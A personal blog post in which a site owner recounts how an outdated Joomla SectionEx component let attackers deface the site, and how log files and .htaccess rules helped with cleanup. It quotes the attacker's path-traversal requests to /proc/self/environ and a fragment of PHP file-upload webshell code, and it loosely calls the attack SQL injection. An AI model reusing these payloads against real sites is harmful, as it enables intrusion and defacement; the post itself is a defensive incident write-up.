Hacked! -- GoDaddy or Joomla Component? PDF Print E-mail

SimplyRaydeen was recently hacked as some of you already found out if you visited at the end of January - January 31st to be exact!  SimplyRaydeen's home page when hacked was changed to 'You have been hacked, where is your security!'

 

Just to clarify up-front -- it wasn't GoDaddy! ... GoDaddy's support has been excellent.  After immediately reporting it to GoDaddy support staff, they let me go through the initial process independently, cleaning up my directory structure, changing passwords, etc.  GoDaddy support staff followed up with me again and let me know when the initial hack happened and how.  They reiterated the files that were initially placed at the root of my web directory (com_joomla.php; db.php; ggk.php; kaka.php; kongkong.php; love.php; save.php -- [see article: Joomla Restricted Access Error - Home page]).  They also verified my findings below and informed me that my initial hack had indeed happened a month earlier

 

Hopefully this will help some of you to troubleshoot and give you an idea of where to start to protect yourself.  This is not to say that my website will not be hacked again; but I'm learning a lot and found some helpful information on the Internet after much searching.

 

After following all the guidelines in regards to changing my passwords, etc.; getting rid of files that I could see were changed and getting my website back up (see article: Joomla Restricted Access Error - Home page) and running, I finally accessed my log files to see what was going on.  SimplyRaydeen.com is hosted by GoDaddy; so I used my hosting management account to access all my files and change everything there.

 

I had no idea of what I was looking for in the log file but downloaded the log file for January 31, 2011 and imported into Excel.  My first step was to sort by IP address and then I started looking at what had been accessed.  As far as I could tell, in addition to some addition of several files, I could only see that it was my homepage that was actually changed so I concentrated on looking for index.php

 

This is what I found that stuck out like a sore thumb: 

1.  IP: 81.169.174.142 - GET simplyraydeen.com//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../

proc/self/environ%0000 HTTP/1.1" 200 1417 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

2. IP: 81.169.174.142 - POST  simplyraydeen.com//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../

proc/self/environ%0000 HTTP/1.1" 200 1485 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

 

There were several other of these posts but I could see that the file size had changed during these events -- the number after the ' HTTP/1.1 200' went down significantly.  But, the most alarming part of the log file was this:

...<input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>'; if( $_POST['_upl'] == \"Upload\" ) { if(
@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo <b>Upload GAGAL !!!</b><br><br>'; } } ?>"...

 

Translated Indonesian to English -- GAGAL (failed); SUKSES (success) -- http://www.babylon.com/definition/gagal/

 

I then did a search for '/proc/self/environ%' on the Internet to see what this was all about. 

 

I used my GoDaddy control panel to access my files and change my .htaccess file there; following the information that I found at the Joomla Discussion Forum.   Using the GoDaddy control panel was for me the most secure way to change anything.

 

It was definitely the SectionEx extension because I hadn't updated it in a while and that appears to be evident in my log file.  My lesson learned here is to update all my extensions routinely!  I found information at the Joomla Discussion Forum again -- http://forum.joomla.org/viewtopic.php?p=2150686 that reiterates the code to be used in the .htaccess file.   One of the most important ones to insert as a 'bad_bot' is 'libwww-perl'!

 

In my reading/searching, it has been consistently said that an attack that is popular among the hacking community is the use of SQL injections. This type of attack is not specific to Joomla it is used to exploit an outdated Joomla component -- in my case -- SectionEX.  Websites are under constant attack as hackers look for components that are not patched and they become easily exploited.   Web page using SectionEX on Simplyraydeen.com - http://www.simplyraydeen.com/general-technical

 

To download the newest version of SectionEX, go to: http://stackideas.com/

 

Rather than repeat the information that should be in your .htaccess file here, please visit the Joomla Discussion Forum -- http://docs.joomla.org/Htaccess_examples_%28security%29#Suggested_Master_htaccess_file -- to get the most up to date information -- they are the experts!  And, look at all of your extensions and update now. 

 

Thank you to GoDaddy support and the Joomla Discussion Forum!

 

 

 

Total Visitors

mod_vvisit_counterTo Date:1355472

Today: Jul 31, 2014